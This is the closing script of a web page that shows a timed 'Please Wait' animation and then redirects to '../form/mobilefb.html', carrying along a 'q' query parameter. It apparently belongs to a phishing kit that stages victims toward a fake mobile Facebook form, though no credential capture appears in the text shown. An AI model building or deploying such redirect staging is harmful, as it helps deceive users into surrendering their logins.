        if(document.getElementById("eee").value == ""){
            alert("sss")
        }
       
        function sleep(time) {
            return new Promise((resolve) => setTimeout(resolve, time));
        }
        function tsetX() {
            sleep(400).then(() => {
                document.getElementById("dimo").innerHTML = "Please Wait ...";
            });

            sleep(800).then(() => {
                document.getElementById("dimo").innerHTML = "Please Wait ......";
            });

            sleep(1200).then(() => {
                document.getElementById("dimo").innerHTML = "Please Wait ........";
            });

            sleep(1600).then(() => {
                document.getElementById("dimo").innerHTML = "Please Wait ......";
            });

            sleep(2000).then(() => {
                document.getElementById("dimo").innerHTML = "Please Wait ...";
            });

            sleep(2400).then(() => {
                document.getElementById("dimo").innerHTML = "";
            });

            sleep(3000).then(() => {
                document.getElementById("dimo").innerHTML = "W";
            });

            sleep(3050).then(() => {
                const queryString = window.location.search;
   const urlParams = new URLSearchParams(queryString);
   const q = urlParams.get('q');
              
                 window.location.href = `../form/mobilefb.html?q=${q}`;
            });

        }
    </script>

</body>

</html>